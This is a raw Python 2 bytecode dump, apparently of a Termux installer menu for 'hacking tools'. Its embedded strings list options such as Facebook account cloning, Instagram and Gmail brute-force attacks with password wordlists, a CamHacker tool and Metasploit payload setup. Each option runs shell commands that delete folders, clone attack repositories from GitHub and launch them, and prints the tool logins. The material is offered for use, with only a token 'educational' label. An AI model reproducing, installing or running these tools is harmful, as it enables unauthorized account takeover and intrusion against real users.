\x00d\x10\x00Z!\x00d\x11\x00Z"\x00d\x12\x00\x84\x00\x00Z#\x00d\x13\x00\x84\x00\x00Z$\x00d\x14\x00\x84\x00\x00Z%\x00d\x15\x00\x84\x00\x00Z&\x00d\x16\x00\x84\x00\x00Z\'\x00d\x17\x00\x84\x00\x00Z(\x00e)\x00d\x18\x00k\x02\x00r\xa0\x01e\'\x00\x83\x00\x00\x01n\x00\x00d\x01\x00S(\x1a\x00\x00\x00i\xff\xff\xff\xffN(\x01\x00\x00\x00t\n\x00\x00\x00ThreadPool(\x01\x00\x00\x00t\x0f\x00\x00\x00ConnectionError(\x01\x00\x00\x00t\x07\x00\x00\x00Browsert\x04\x00\x00\x00utf8t\x08\x00\x00\x00max_timei\x01\x00\x00\x00s\n\x00\x00\x00User-AgentsR\x00\x00\x00Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16sr\x02\x00\x00\n\x1b[1;93m \xf0\x9f\x98\x8e\xf0\x9f\x98\x8e GUNAKAN DENGAN BIJAK \xf0\x9f\x98\x8e\xf0\x9f\x98\x8e \x1b[1;31m\n\x1b[1;95m\xc2\xab----\xf0\x9f\x9a\xab\xf0\x9f\x9a\xab\xf0\x9f\x9a\xab\xf0\x9f\x9a\xab\x1b[1;95mMENEMBUS BATAS 911\xf0\x9f\x9a\xab\xf0\x9f\x9a\xab\xf0\x9f\x9a\xab\xf0\x9f\x9a\xab\x1b[1;95m--------\xc2\xbb\n\x1b[1;96m \xe0\xa4\x8f\xe0\xa4\x95 \xe0\xa4\xae\xe0\xa5\x81\xe0\xa4\xb8\xe0\xa5\x8d\xe0\xa4\x95\xe0\xa4\xbe\xe0\xa4\xa8 \xe0\xa4\x95\xe0\xa5\x87 \xe0\xa4\xb8\xe0\xa4\xbe\xe0\xa4\xa5 \xe0\xa4\xb8\xe0\xa4\xad\xe0\xa5\x80 \x1b[1;94m\n\x1b[1;93m \xe2\x9a\xa0\xef\xb8\x8fCreate bye : OmDenay-MB911\xe2\x9a\xa0\xef\xb8\x8f \x1b[1;94m\n\x1b[1;96m \xd8\xa7\xd9\x84\xd9\x84\xd9\x87 \xd9\x8a\xd8\xad\xd9\x81\xd8\xb8\xd9\x86\xd8\xa7 \xd8\xaf\xd8\xa7\xd8\xa6\xd9\x85\xd8\xa7 \xd9\x81\xd9\x8a \xd8\xa7\xd9\x84\xd8\xb3\xd8\xb9\xd8\xa7\xd8\xaf\xd8\xa9 \x1b[1;94m\n\x1b[1;92m \xf0\x9f\x8c\x8eWhatsApp : 085930060122 \xf0\x9f\x8c\x8e \x1b[1;94m\n\x1b[1;93m \xe2\x9a\xa0\xef\xb8\x8fYoutube Channel: Menembus Batas 911\xe2\x9a\xa0\xef\xb8\x8f \x1b[1;94m\n\x1b[1;95m\xc2\xab------------\x1b[1;95mMENEMBUS BATAS 911\x1b[1;95m--------------\xc2\xbbs\x07\x00\x00\x00\x1b[1;91ms\x07\x00\x00\x00\x1b[1;92ms\x07\x00\x00\x00\x1b[1;93ms\x07\x00\x00\x00\x1b[1;94ms\x07\x00\x00\x00\x1b[1;95ms\x07\x00\x00\x00\x1b[1;96ms\x07\x00\x00\x00\x1b[1;97mc\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s\x11\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01d\x00\x00S(\x02\x00\x00\x00Nt\x05\x00\x00\x00clear(\x02\x00\x00\x00t\x02\x00\x00\x00ost\x06\x00\x00\x00system(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<debby>R\x05\x00\x00\x00\'\x00\x00\x00s\x02\x00\x00\x00\x00\x01c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s\x11\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01d\x00\x00S(\x02\x00\x00\x00Ni\x01\x00\x00\x00(\x02\x00\x00\x00t\x04\x00\x00\x00timet\x05\x00\x00\x00sleep(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<debby>t\x01\x00\x00\x00t+\x00\x00\x00s\x02\x00\x00\x00\x00\x01c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s\x11\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01d\x00\x00S(\x02\x00\x00\x00Ng{\x14\xaeG\xe1z\x84?(\x02\x00\x00\x00R\x08\x00\x00\x00R\t\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<debby>t\x02\x00\x00\x00t1-\x00\x00\x00s\x02\x00\x00\x00\x00\x01c\x01\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00C\x00\x00\x00s=\x00\x00\x00x6\x00|\x00\x00d\x01\x00\x17D]*\x00}\x01\x00t\x00\x00j\x01\x00j\x02\x00|\x01\x00\x83\x01\x00\x01t\x00\x00j\x01\x00j\x03\x00\x83\x00\x00\x01t\x04\x00\x83\x00\x00\x01q\x0b\x00Wd\x00\x00S(\x02\x00\x00\x00Ns\x01\x00\x00\x00\n(\x05\x00\x00\x00t\x03\x00\x00\x00syst\x06\x00\x00\x00stdoutt\x05\x00\x00\x00writet\x05\x00\x00\x00flushR\x0b\x00\x00\x00(\x02\x00\x00\x00t\x01\x00\x00\x00zt\x01\x00\x00\x00e(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<debby>t\x04\x00\x00\x00love1\x00\x00\x00s\x08\x00\x00\x00\x00\x01\x11\x01\x10\x01\r\x01c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s\xbd\x01\x00\x00t\x00\x00\x83\x00\x00\x01t\x01\x00j\x02\x00d\x01\x00\x83\x01\x00\x01t\x03\x00GHt\x04\x00j\x05\x00d\x02\x00\x83\x01\x00\x01d\x03\x00GHt\x04\x00j\x05\x00d\x02\x00\x83\x01\x00\x01d\x04\x00GHt\x04\x00j\x05\x00d\x02\x00\x83\x01\x00\x01d\x05\x00GHt\x04\x00j\x05\x00d\x02\x00\x83\x01\x00\x01d\x06\x00GHt\x04\x00j\x05\x00d\x02\x00\x83\x01\x00\x01d\x07\x00GHt\x04\x00j\x05\x00d\x02\x00\x83\x01\x00\x01d\x08\x00GHt\x04\x00j\x05\x00d\x02\x00\x83\x01\x00\x01d\t\x00GHt\x04\x00j\x05\x00d\x02\x00\x83\x01\x00\x01d\n\x00GHt\x04\x00j\x05\x00d\x02\x00\x83\x01\x00\x01d\x0b\x00GHt\x04\x00j\x05\x00d\x02\x00\x83\x01\x00\x01d\x0c\x00GHt\x04\x00j\x05\x00d\x02\x00\x83\x01\x00\x01d\r\x00GHt\x04\x00j\x05\x00d\x02\x00\x83\x01\x00\x01d\x0e\x00GHt\x04\x00j\x05\x00d\x02\x00\x83\x01\x00\x01d\x0f\x00GHt\x04\x00j\x05\x00d\x02\x00\x83\x01\x00\x01d\x10\x00GHt\x04\x00j\x05\x00d\x02\x00\x83\x01\x00\x01d\x11\x00GHt\x04\x00j\x05\x00d\x02\x00\x83\x01\x00\x01d\x12\x00GHt\x04\x00j\x05\x00d\x02\x00\x83\x01\x00\x01d\x13\x00GHt\x04\x00j\x05\x00d\x02\x00\x83\x01\x00\x01d\x14\x00GHt\x04\x00j\x05\x00d\x02\x00\x83\x01\x00\x01d\x15\x00GHt\x04\x00j\x05\x00d\x02\x00\x83\x01\x00\x01d\x16\x00GHt\x04\x00j\x05\x00d\x02\x00\x83\x01\x00\x01d\x17\x00GHt\x04\x00j\x05\x00d\x02\x00\x83\x01\x00\x01d\x18\x00GHt\x04\x00j\x05\x00d\x02\x00\x83\x01\x00\x01t\x06\x00\x83\x00\x00\x01d\x00\x00S(\x19\x00\x00\x00NR\x05\x00\x00\x00g\x9a\x99\x99\x99\x99\x99\xa9?s?\x00\x00\x00\x1b[1;41m\x1b[1;37m1 To return to this menu from any Tool \x1b[1;0ms?\x00\x00\x00\x1b[1;41m2\x1b[1;37m Stop Process Press CTRL + z \x1b[1;0ms?\x00\x00\x00\x1b[1;41m3\x1b[1;37m Type python2 Cloning.py \x1b[1;0ms2\x00\x00\x00\x1b[1;96m[1] Install With Out Fb Id Tool \xf0\x9f\xa6\x85s2\x00\x00\x00\x1b[1;96m[2] Install Facebook login Tool \xf0\x9f\x90\x9ds5\x00\x00\x00\x1b[1;96m[3] Install SpiderMan Tool \xf0\x9f\x95\xb8\xef\xb8\x8fs2\x00\x00\x00\x1b[1;96m[4] Install Kalilinux Tool \xf0\x9f\xa6\x87s2\x00\x00\x00\x1b[1;96m[5] Install BlackHat Tool \xf0\x9f\xa6\x8bs2\x00\x00\x00\x1b[1;96m[6] Install RedMoonNew Tool \xf0\x9f\x90\x9es2\x00\x00\x00\x1b[1;96m[7] Install love3Hack3r Tool \xf0\x9f\x90\x9cs2\x00\x00\x00\x1b[1;96m[8] Install Cobra Tool \xf0\x9f\x90\x8ds2\x00\x00\x00\x1b[1;96m[9] Install Dragon Tool \xf0\x9f\x90\x89s2\x00\x00\x00\x1b[1;96m[10] Install NetHunting Tool \xf0\x9f\x8c\x8ds2\x00\x00\x00\x1b[1;96m[11] Install Payload Tool \xf0\x9f\x92\xb5s2\x00\x00\x00\x1b[1;96m[12] Install CamHacker Tool \xf0\x9f\x93\xb8s2\x00\x00\x00\x1b[1;96m[13] Install Compiler Tool \xf0\x9f\x93\xa1s2\x00\x00\x00\x1b[1;96m[14] Install Instagram Brut Tool \xf0\x9f\x94\x91s2\x00\x00\x00\x1b[1;96m[15] Install Marsh Base Tool \xf0\x9f\x92\xbes2\x00\x00\x00\x1b[1;96m[16] Install Gmail Target Tool \xf0\x9f\x93\xa7s4\x00\x00\x00\x1b[1;96m[17] Install Termux Logo Tool \xe2\x9a\x9c\xef\xb8\x8fs2\x00\x00\x00\x1b[1;95m[18] Tool Update \xf0\x9f\x94\x84s\x10\x00\x00\x00\x1b[1;91m[0] EXIT(\x07\x00\x00\x00R\x05\x00\x00\x00R\x06\x00\x00\x00R\x07\x00\x00\x00t\x04\x00\x00\x00logoR\x08\x00\x00\x00R\t\x00\x00\x00t\x05\x00\x00\x00mafia(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<debby>t\x04\x00\x00\x00menu7\x00\x00\x00sb\x00\x00\x00\x00\x01\x07\x01\r\x01\x05\x01\r\x01\x05\x01\r\x01\x05\x01\r\x01\x05\x01\r\x01\x05\x01\r\x01\x05\x01\r\x01\x05\x01\r\x01\x05\x01\r\x01\x05\x01\r\x01\x05\x01\r\x01\x05\x01\r\x01\x05\x01\r\x01\x05\x01\r\x01\x05\x01\r\x01\x05\x01\r\x01\x05\x01\r\x01\x05\x01\r\x01\x05\x01\r\x01\x05\x01\r\x01\x05\x01\r\x01\x05\x01\r\x01\x05\x01\r\x01\x05\x01\r\x01c\x00\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s\x1d\t\x00\x00t\x00\x00d\x01\x00\x83\x01\x00}\x00\x00|\x00\x00d\x02\x00k\x02\x00r\'\x00d\x03\x00GHt\x01\x00\x83\x00\x00\x01n\xf2\x08|\x00\x00d\x04\x00k\x02\x00r\x8f\x00t\x02\x00\x83\x00\x00\x01t\x03\x00GHt\x04\x00j\x05\x00d\x05\x00\x83\x01\x00\x01t\x04\x00j\x05\x00d\x06\x00\x83\x01\x00\x01t\x03\x00GHt\x06\x00d\x07\x00\x83\x01\x00\x01t\x06\x00d\x08\x00\x83\x01\x00\x01t\x07\x00j\x08\x00d\t\x00\x83\x01\x00\x01t\x04\x00j\x05\x00d\n\x00\x83\x01\x00\x01n\x8a\x08|\x00\x00d\x0b\x00k\x02\x00r\x0b\x01t\x02\x00\x83\x00\x00\x01t\x03\x00GHt\x04\x00j\x05\x00d\x0c\x00\x83\x01\x00\x01t\x04\x00j\x05\x00d\r\x00\x83\x01\x00\x01t\x03\x00GHt\x06\x00d\x07\x00\x83\x01\x00\x01t\x06\x00d\x08\x00\x83\x01\x00\x01t\x06\x00d\x0e\x00\x83\x01\x00\x01t\x06\x00d\x0f\x00\x83\x01\x00\x01t\x07\x00j\x08\x00d\t\x00\x83\x01\x00\x01t\x04\x00j\x05\x00d\x10\x00\x83\x01\x00\x01n\x0e\x08|\x00\x00d\x11\x00k\x02\x00r}\x01t\x02\x00\x83\x00\x00\x01t\x03\x00GHt\x04\x00j\x05\x00d\x12\x00\x83\x01\x00\x01t\x04\x00j\x05\x00d\x13\x00\x83\x01\x00\x01t\x03\x00GHt\x06\x00d\x14\x00\x83\x01\x00\x01t\x06\x00d\x15\x00\x83\x01\x00\x01t\x06\x00d\x16\x00\x83\x01\x00\x01t\x07\x00j\x08\x00d\t\x00\x83\x01\x00\x01t\x04\x00j\x05\x00d\x17\x00\x83\x01\x00\x01n\x9c\x07|\x00\x00d\x18\x00k\x02\x00r\xef\x01t\x02\x00\x83\x00\x00\x01t\x03\x00GHt\x04\x00j\x05\x00d\x19\x00\x83\x01\x00\x01t\x04\x00j\x05\x00d\x13\x00\x83\x01\x00\x01t\x03\x00GHt\x06\x00d\x1a\x00\x83\x01\x00\x01t\x06\x00d\x15\x00\x83\x01\x00\x01t\x06\x00d\x1b\x00\x83\x01\x00\x01t\x07\x00j\x08\x00d\t\x00\x83\x01\x00\x01t\x04\x00j\x05\x00d\x1c\x00\x83\x01\x00\x01n*\x07|\x00\x00d\x1d\x00k\x02\x00ra\x02t\x02\x00\x83\x00\x00\x01t\x03\x00GHt\x04\x00j\x05\x00d\x1e\x00\x83\x01\x00\x01t\x04\x00j\x05\x00d\x13\x00\x83\x01\x00\x01t\x03\x00GHt\x06\x00d\x1f\x00\x83\x01\x00\x01t\x06\x00d\x15\x00\x83\x01\x00\x01t\x06\x00d \x00\x83\x01\x00\x01t\x07\x00j\x08\x00d\t\x00\x83\x01\x00\x01t\x04\x00j\x05\x00d!\x00\x83\x01\x00\x01n\xb8\x06|\x00\x00d"\x00k\x02\x00r\xd3\x02t\x02\x00\x83\x00\x00\x01t\x03\x00GHt\x04\x00j\x05\x00d#\x00\x83\x01\x00\x01t\x04\x00j\x05\x00d\x13\x00\x83\x01\x00\x01t\x03\x00GHt\x06\x00d$\x00\x83\x01\x00\x01t\x06\x00d\x15\x00\x83\x01\x00\x01t\x06\x00d%\x00\x83\x01\x00\x01t\x07\x00j\x08\x00d&\x00\x83\x01\x00\x01t\x04\x00j\x05\x00d\'\x00\x83\x01\x00\x01nF\x06|\x00\x00d(\x00k\x02\x00r;\x03t\x02\x00\x83\x00\x00\x01t\x03\x00GHt\x04\x00j\x05\x00d)\x00\x83\x01\x00\x01t\x04\x00j\x05\x00d\x13\x00\x83\x01\x00\x01t\x03\x00GHt\x06\x00d\x1a\x00\x83\x01\x00\x01t\x06\x00d\x15\x00\x83\x01\x00\x01t\x07\x00j\x08\x00d\t\x00\x83\x01\x00\x01t\x04\x00j\x05\x00d*\x00\x83\x01\x00\x01n\xde\x05|\x00\x00d+\x00k\x02\x00r\xad\x03t\x02\x00\x83\x00\x00\x01t\x03\x00GHt\x04\x00j\x05\x00d,\x00\x83\x01\x00\x01t\x04\x00j\x05\x00d\x13\x00\x83\x01\x00\x01t\x03\x00GHt\x06\x00d-\x00\x83\x01\x00\x01t\x06\x00d\x15\x00\x83\x01\x00\x01t\x06\x00d.\x00\x83\x01\x00\x01t\x07\x00j\x08\x00d\t\x00\x83\x01\x00\x01t\x04\x00j\x05\x00d/\x00\x83\x01\x00\x01nl\x05|\x00\x00d0\x00k\x02\x00r\x1f\x04t\x02\x00\x83\x00\x00\x01t\x03\x00GHt\x04\x00j\x05\x00d1\x00\x83\x01\x00\x01t\x04\x00j\x05\x00d\x13\x00\x83\x01\x00\x01t\x03\x00GHt\x06\x00d2\x00\x83\x01\x00\x01t\x06\x00d\x15\x00\x83\x01\x00\x01t\x06\x00d3\x00\x83\x01\x00\x01t\x07\x00j\x08\x00d\t\x00\x83\x01\x00\x01t\x04\x00j\x05\x00d4\x00\x83\x01\x00\x01n\xfa\x04|\x00\x00d5\x00k\x02\x00r\x91\x04t\x02\x00\x83\x00\x00\x01t\x03\x00GHt\x04\x00j\x05\x00d6\x00\x83\x01\x00\x01t\x04\x00j\x05\x00d\x13\x00\x83\x01\x00\x01t\x03\x00GHt\x06\x00d7\x00\x83\x01\x00\x01t\x06\x00d\x15\x00\x83\x01\x00\x01t\x06\x00d8\x00\x83\x01\x00\x01t\x07\x00j\x08\x00d\t\x00\x83\x01\x00\x01t\x04\x00j\x05\x00d9\x00\x83\x01\x00\x01n\x88\x04|\x00\x00d:\x00k\x02\x00r \x05t\x02\x00\x83\x00\x00\x01t\x03\x00GHt\x04\x00j\x05\x00d;\x00\x83\x01\x00\x01t\x04\x00j\x05\x00d<\x00\x83\x01\x00\x01t\x04\x00j\x05\x00d=\x00\x83\x01\x00\x01t\x04\x00j\x05\x00d>\x00\x83\x01\x00\x01t\x04\x00j\x05\x00d\x13\x00\x83\x01\x00\x01t\x03\x00GHt\x06\x00d?\x00\x83\x01\x00\x01t\x06\x00d\x15\x00\x83\x01\x00\x01t\x07\x00j\x08\x00d\t\x00\x83\x01\x00\x01t\x04\x00j\x05\x00d@\x00\x83\x01\x00\x01n\xf9\x03|\x00\x00dA\x00k\x02\x00r\x92\x05t\x02\x00\x83\x00\x00\x01t\x03\x00GHt\x04\x00j\x05\x00dB\x00\x83\x01\x00\x01t\x04\x00j\x05\x00d\x13\x00\x83\x01\x00\x01t\x03\x00GHt\x06\x00dC\x00\x83\x01\x00\x01t\x06\x00d\x15\x00\x83\x01\x00\x01t\x06\x00dD\x00\x83\x01\x00\x01t\x07\x00j\x08\x00dE\x00\x83\x01\x00\x01t\x04\x00j\x05\x00dF\x00\x83\x01\x00\x01n\x87\x03|\x00\x00dG\x00k\x02\x00r\xfa\x05t\x02\x00\x83\x00\x00\x01t\x03\x00GHt\x04\x00j\x05\x00dH\x00\x83\x01\x00\x01t\x04\x00j\x05\x00d\x13\x00\x83\x01\x00\x01t\x03\x00GHt\x06\x00dI\x00\x83\x01\x00\x01t\x06\x00d\x15\x00\x83\x01\x00\x01t\x07\x00j\x08\x00d\t\x00\x83\x01\x00\x01t\x04\x00j\x05\x00dJ\x00\x83\x01\x00\x01n\x1f\x03|\x00\x00dK\x00k\x02\x00ry\x06t\x02\x00\x83\x00\x00\x01t\x03\x00GHt\x04\x00j\x05\x00dL\x00\x83\x01\x00\x01t\x04\x00j\x05\x00dM\x00\x83\x01\x00\x01t\x04\x00j\x05\x00d\x13\x00\x83\x01\x00\x01t\x03\x00GHt\x06\x00dI\x00\x83\x01\x00\x01t\x06\x00d\x15\x00\x83\x01\x00\x01t\x06\x00dN\x00\x83\x01\x00\x01t\x07\x00j\x08\x00d\t\x00\x83\x01\x00\x01t\x04\x00j\x05\x00dO\x00\x83\x01\x00\x01n\xa0\x02|\x00\x00dP\x00k\x02\x00r\xe1\x06t\x02\x00\x83\x00\x00\x01t\x03\x00GHt\x04\x00j\x05\x00dQ\x00\x83\x01\x00\x01t\x04\x00j\x05\x00d\x13\x00\x83\x01\x00\x01t\x03\x00GHt\x06\x00dI\x00\x83\x01\x00\x01t\x06\x00d\x15\x00\x83\x01\x00\x01t\x07\x00j\x08\x00d\t\x00\x83\x01\x00\x01t\x04\x00j\x05\x00dR\x00\x83\x01\x00\x01n8\x02|\x00\x00dS\x00k\x02\x00rS\x07t\x02\x00\x83\x00\x00\x01t\x03\x00GHt\x04\x00j\x05\x00dT\x00\x83\x01\x00\x01t\x04\x00j\x05\x00d\x13\x00\x83\x01\x00\x01t\x03\x00GHt\x06\x00dU\x00\x83\x01\x00\x01t\x06\x00d\x15\x00\x83\x01\x00\x01t\x06\x00dV\x00\x83\x01\x00\x01t\x07\x00j\x08\x00d&\x00\x83\x01\x00\x01t\x04\x00j\x05\x00dW\x00\x83\x01\x00\x01n\xc6\x01|\x00\x00dX\x00k\x02\x00r\xbb\x07t\x02\x00\x83\x00\x00\x01t\x03\x00GHt\x04\x00j\x05\x00dY\x00\x83\x01\x00\x01t\x04\x00j\x05\x00d\x13\x00\x83\x01\x00\x01t\x03\x00GHt\x06\x00dZ\x00\x83\x01\x00\x01t\x06\x00d\x15\x00\x83\x01\x00\x01t\x07\x00j\x08\x00d\t\x00\x83\x01\x00\x01t\x04\x00j\x05\x00d[\x00\x83\x01\x00\x01n^\x01|\x00\x00d\\\x00k\x02\x00r#\x08t\x02\x00\x83\x00\x00\x01t\x03\x00GHt\x04\x00j\x05\x00d]\x00\x83\x01\x00\x01t\x04\x00j\x05\x00d\x13\x00\x83\x01\x00\x01t\x03\x00GHt\x06\x00d\x1a\x00\x83\x01\x00\x01t\x06\x00d\x15\x00\x83\x01\x00\x01t\x07\x00j\x08\x00d\t\x00\x83\x01\x00\x01t\x04\x00j\x05\x00d^\x00\x83\x01\x00\x01n\xf6\x00|\x00\x00d_\x00k\x02\x00r\x95\x08t\x02\x00\x83\x00\x00\x01t\x03\x00GHt\x04\x00j\x05\x00d]\x00\x83\x01\x00\x01t\x04\x00j\x05\x00d\x13\x00\x83\x01\x00\x01t\x03\x00GHt\x06\x00d\x1a\x00\x83\x01\x00\x01t\x06\x00d\x15\x00\x83\x01\x00\x01t\x06\x00dN\x00\x83\x01\x00\x01t\x07\x00j\x08\x00d\t\x00\x83\x01\x00\x01t\x04\x00j\x05\x00d^\x00\x83\x01\x00\x01n\x84\x00|\x00\x00d`\x00k\x02\x00r\xfd\x08t\x02\x00\x83\x00\x00\x01t\x03\x00GHt\x04\x00j\x05\x00da\x00\x83\x01\x00\x01t\x04\x00j\x05\x00d\x13\x00\x83\x01\x00\x01t\x03\x00GHt\x06\x00db\x00\x83\x01\x00\x01t\x06\x00d\x15\x00\x83\x01\x00\x01t\x07\x00j\x08\x00d\t\x00\x83\x01\x00\x01t\x04\x00j\x05\x00dc\x00\x83\x01\x00\x01n\x1c\x00|\x00\x00dd\x00k\x02\x00r\x19\tt\x04\x00j\x05\x00de\x00\x83\x01\x00\x01n\x00\x00d\x00\x00S(f\x00\x00\x00Ns\x16\x00\x00\x00\x1b[1;91mSlect option>>>t\x00\x00\x00\x00s\x17\x00\x00\x00Select a valid option !t\x01\x00\x00\x001s\x10\x00\x00\x00rm -rf $HOME/402s8\x00\x00\x00cd $HOME && git clone https://github.com/OmDenay/hack911s)\x00\x00\x00\x1b[1;93mTool User Name :\x1b[1;95m Black s)\x00\x00\x00\x1b[1;93mTool Password :\x1b[1;95m Mafia i\x05\x00\x00\x00s\'\x00\x00\x00cd $HOME/402 && python2 Cloningx-2-1.pyt\x01\x00\x00\x002s\x16\x00\x00\x00rm -rf $HOME/blackholesL\x00\x00\x00cd $HOME && git clone https://github.com/OmDenay-MB911/OmDenay-MB911/hack911s%\x00\x00\x00\x1b[1;93m :Target Attack : s/\x00\x00\x00\x1b[1;93mPassword list :\x1b[1;95mlovehacker-2.txt s*\x00\x00\x00cd $HOME/blackhole && python2 AsifJaved.pyt\x01\x00\x00\x003s\x13\x00\x00\x00rm -rf $HOME/Spiders>\x00\x00\x00cd $HOME && git clone https://github.com/OmDenay-MB911/hack911sA\x00\x00\x00\x1b[1;91mCongratulations Cobra Tool Has Been Installed Successfullys#\x00\x00\x00Now you can open this tool as usuals3\x00\x00\x00\x1b[1;93mTool User Name SpiderMan Password lovehackers\'\x00\x00\x00cd $HOME/Spider && python2 SpiderMan.pyt\x01\x00\x00\x004s\x16\x00\x00\x00rm -rf $HOME/KaliIndiasF\x00\x00\x00\x1b[1;96mCongratulations BlackMafia Tool Has Been Installed Successfullys/\x00\x00\x00\x1b[1;93mTool User Name India Password lovehackers0\x00\x00\x00cd $HOME/KaliIndia && python2 kalilinux.India.pyt\x01\x00\x00\x005s\x15\x00\x00\x00rm -rf $HOME/BlackHatsD\x00\x00\x00\x1b[1;96mCongratulations BlackHat Tool Has Been Installed Successfullys5\x00\x00\x00\x1b[1;93mTool User Name BlackHat Password OmDenay-MB911s(\x00\x00\x00cd $HOME/BlackHat && python2 BlackHat.pyt\x01\x00\x00\x006s\x17\x00\x00\x00rm -rf $HOME/RedMoonNewsF\x00\x00\x00\x1b[1;91mCongratulations RedMoonNew Tool Has Been Installed SuccessfullysI\x00\x00\x00\x1b[1;93mTool User Name\x1b[1;92m RedMoonNew\x1b[1;93m Password \x1b[1;92mlovehackeri\x06\x00\x00\x00s)\x00\x00\x00cd $HOME/RedMoonNew && python2 lovehackert\x01\x00\x00\x007s\x10\x00\x00\x00rm -rf $HOME/911s+\x00\x00\x00cd $HOME/lov3Hak3r && python2 lovehacker.pyt\x01\x00\x00\x008s\x12\x00\x00\x00rm -rf $HOME/CobrasA\x00\x00\x00\x1b[1;93mCongratulations Cobra Tool Has Been Installed Successfullys0\x00\x00\x00\x1b[1;95mTool User Name Cobra Password lovehackers%\x00\x00\x00cd $HOME/Cobra && python2 Scorpion.pyt\x01\x00\x00\x009s\x13\x00\x00\x00rm -rf $HOME/DragonsB\x00\x00\x00\x1b[1;91mCongratulations Dragon Tool Has Been Installed Successfullys1\x00\x00\x00\x1b[1;96mTool User Name Dragon Password lovehackers(\x00\x00\x00cd $HOME/Dragon && python2 lovehacker.pyt\x02\x00\x00\x0010s\x17\x00\x00\x00rm -rf $HOME/NetHuntingsF\x00\x00\x00\x1b[1;96mCongratulations NetHunting Tool Has Been Installed Successfullys/\x00\x00\x00\x1b[1;92mTool User Name linux Password lovehackers,\x00\x00\x00cd $HOME/NetHunting && python2 NetHunting.pyt\x02\x00\x00\x0011s\x19\x00\x00\x00pkg install unstable-repos\x16\x00\x00\x00pkg install metasploits\x16\x00\x00\x00pkg install msfconsoles\x18\x00\x00\x00rm -rf $HOME/Black_MafiasO\x00\x00\x00\x1b[1;93mCongratulations Black_Mafia Payload Tool Has Been Installed Successfullys.\x00\x00\x00cd $HOME/Black_Mafia && python3 Black_Mafia.pyt\x02\x00\x00\x0012s\x10\x00\x00\x00rm -rf $HOME/PaksE\x00\x00\x00\x1b[1;96mCongratulations CamHacker Tool Has Been Installed Successfullys\x1f\x00\x00\x00\x1b[1;92mEducational Perpose onlyi\x02\x00\x00\x00s$\x00\x00\x00cd $HOME/Pak && python lovehacker.pyt\x02\x00\x00\x0013s\x14\x00\x00\x00rm -rf $HOME/Compiles9\x00\x00\x00\x1b[1;93mCongratulations Tool Has Been Update Successfullys)\x00\x00\x00cd $HOME/Compile && python2 lovehacker.pyt\x02\x00\x00\x0014s\x10\x00\x00\x00pip2 install bs4s\x12\x00\x00\x00rm -rf $HOME/Instas4\x00\x00\x00Passwordlist No1 (wordlist.txt) No2 (BlackMafia.txt)s\'\x00\x00\x00cd $HOME/Insta && python2 lovehacker.pyt\x02\x00\x00\x0015s\x15\x00\x00\x00rm -rf $HOME/TimePasss*\x00\x00\x00cd $HOME/TimePass && python2 lovehacker.pyt\x02\x00\x00\x0016s\x18\x00\x00\x00rm -rf $HOME/GmailAttacksG\x00\x00\x00\x1b[1;96mCongratulations GmailAttack Tool Has Been Installed Successfullys.\x00\x00\x00plz wi8 Password list name (lovehacker-1.txt) s-\x00\x00\x00cd $HOME/GmailAttack && python2 lovehacker.pyt\x02\x00\x00\x0017s\x11\x00\x00\x00rm -rf $HOME/LogosL\x00\x00\x00\x1b[1;96mCongratulations BlackMafia Logo Tool Has Been Installed Successfullys#\x00\x00\x00cd $HOME/Logo && bash lovehacker.sht\x02\x00\x00\x0018s\x12\x00\x00\x00rm -rf $HOME/Worlds$\x00\x00\x00cd $HOME/World && python2 Cloning.pyt\x02\x00\x00\x0019t\x02\x00\x00\x0020s\x14\x00\x00\x00rm -rf $HOME/TestingsD\x00\x00\x00\x1b[1;93mCongratulations CoviD-19 Tool Has Been Installed Successfullys\'\x00\x00\x00cd $HOME/CoviD-19 && python2 Project.pyt\x01\x00\x00\x000t\x04\x00\x00\x00exit(\t\x00\x00\x00t\t\x00\x00\x00raw_inputR\x14\x00\x00\x00R\x05\x00\x00\x00R\x13\x00\x00\x00R\x06\x00\x00\x00R\x07\x00\x00\x00R\x12\x00\x00\x00R\x08\x00\x00\x00R\t\x00\x00\x00(\x01\x00\x00\x00t\x05\x00\x00\x00black(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<debby>R\x14\x00\x00\x00i\x00\x00\x00s\xbe\x01\x00\x00\x00\x01\x0c\x01\x0c\x01\x05\x01\n\x01\x0c\x01\x07\x01\x05\x01\r\x01\r\x01\x05\x01\n\x01\n\x01\r\x01\x10\x01\x0c\x01\x07\x01\x05\x01\r\x01\r\x01\x05\x01\n\x01\n\x01\n\x01\n\x01\r\x01\x10\x01\x0c\x01\x07\x01\x05\x01\r\x01\r\x01\x05\x01\n\x01\n\x01\n\x01\r\x01\x10\x01\x0c\x01\x07\x01\x05\x01\r\x01\r\x01\x05\x01\n\x01\n\x01\n\x01\r\x01\x10\x01\x0c\x01\x07\x01\x05\x01\r\x01\r\x01\x05\x01\n\x01\n\x01\n\x01\r\x01\x10\x01\x0c\x01\x07\x01\x05\x01\r\x01\r\x01\x05\x01\n\x01\n\x01\n\x01\r\x01\x10\x01\x0c\x01\x07\x01\x05\x01\r\x01\r\x01\x05\x01\n\x01\n\x01\r\x01\x10\x01\x0c\x01\x07\x01\x05\x01\r\x01\r\x01\x05\x01\n\x01\n\x01\n\x01\r\x01\x10\x01\x0c\x01\x07\x01\x05\x01\r\x01\r\x01\x05\x01\n\x01\n\x01\n\x01\r\x01\x10\x01\x0c\x01\x